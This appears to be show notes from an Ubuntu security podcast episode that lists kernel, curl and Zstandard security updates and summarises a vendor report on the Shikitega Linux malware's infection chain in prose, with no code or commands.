Episode 176

Posted on Friday, Sep 9, 2022
On this week’s episode we dive into the Shikitega Linux malware report from AT&T Alien Labs, plus we cover security updates for the Linux kernel, curl and Zstandard as well as some open positions on the team. Join us!

Show Notes


On this week’s episode we dive into the Shikitega Linux malware report from AT&T Alien Labs, plus we cover security updates for the Linux kernel, curl and Zstandard as well as some open positions on the team. Join us!

This week in Ubuntu Security Updates

13 unique CVEs addressed

[USN-5591-1, USN-5591-2, USN-5591-3, USN-5591-4, USN-5597-1, USN-5598-1] Linux kernel (+ HWE, AWS, Oracle) vulnerability [00:47]

[USN-5592-1, USN-5595-1, USN-5596-1, USN-5600-1] Linux kernel (+ OEM, HWE) vulnerabilities [01:04]

  • 2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
  • OOB write in virtual terminal driver when changing VGA console fonts
  • Improper control flow mgmt in Intel 10GbE PCIe driver - local DoS

[USN-5594-1, USN-5599-1] Linux kernel (+ Oracle) vulnerabilities [01:28]

[USN-5587-1] curl vulnerability [02:12]

  • 1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
  • Cookies generally contain NAME=VALUE pairs using ASCII chars for both
  • ASCII character set contains usual A-Za-z0-9 and punctuation (space, “!#&) plus a bunch of control codes - NUL, BEL, LF, CR, HT (\t) and more
  • These have a byte value below 32
  • curl since 4.9 would accept cookies with control codes
  • As with cookies, these get sent back to the server on subsequent requests
  • Over time web servers have started rejecting cookies with control codes and returning a HTTP 400 response code (Bad Request)
  • As such, a malicious “sister site” could return a cookie with control codes inside it, this then would get sent by curl to other sites in the same domain, which would then reject the request and effectively DoS the user
  • Fixed to have curl validate and then reject such cookies in the first place

[USN-5593-1] Zstandard vulnerability [04:34]

Goings on in Ubuntu Security Community

AT&T Alien Labs teardown of Shikitega Linux malware [05:40]

  • https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux
  • Targets endpoints and IoT devices running Linux
  • Uses multiple different binaries to achieve its purpose - each does one task of the process
  • Uses various components of Metasploit along the way
    • Framework containing various exploits plus different tools to help develop exploits as well as scan environments etc
  • Initial dropper is a very small binary that is encoded using one of the standard Metasploit encoders to help it evade detection from AV scanners etc
  • Decodes basic shellcode to open a socket to the C2 server and downloads additional shellcode to run plus the mettle interpreter so that it can make use of off-the-shelf components from Metasploit in further stages
  • Also downloads the next stage dropper
  • This again is encoded the same as the first component - contained within is shellcode to spawn a shell via /bin/sh - from this shell it then attempts to run commands to exploit two known privesc vulns - CVE-2021-4034 ([USN-5252-1, USN-5252-2] PolicyKit vulnerability from Episode 147) and CVE-2021-3493 ([USN-4916-2] Linux kernel vulnerability in Episode 113)
  • Once has gained root privileges via these vulns, with then move on to achieve persistence and execute the primary payload - cryptominer
  • Persistence is achieved simply by using cron to download the cryptominer from C2 on boot - and then another cron job to execute the cryptominer - and this is done for both the standard user and root
  • As such the only traces left on the machine at reboot is the crontabs
  • cryptominer is the XMRig and is configured to mine Monero
  • C2 is seemingly fronted by cloudflare and cloudfront
  • No details provided on initial compromise but is good to see details on the privesc vulns - both of these were patched in Ubuntu quite a while ago - and we released a Livepatch for the kernel privesc too - shows the value in such services - can still stay protected against the kind of vulnerabilities that attackers are actually exploiting without the need to reboot
  • Shows the increasing prevalence of Linux malware (and the resulting interest in it from organisations like AT&T) but also the value in ensuring systems are kept updated

systemd/open-vm-tools regression for Ubuntu 18.04 LTS [10:56]

  • Had mentioned last week that I would likely cover this - is still a work-in-progress so hopefully next week 🤞

Hiring [11:30]

Get in contact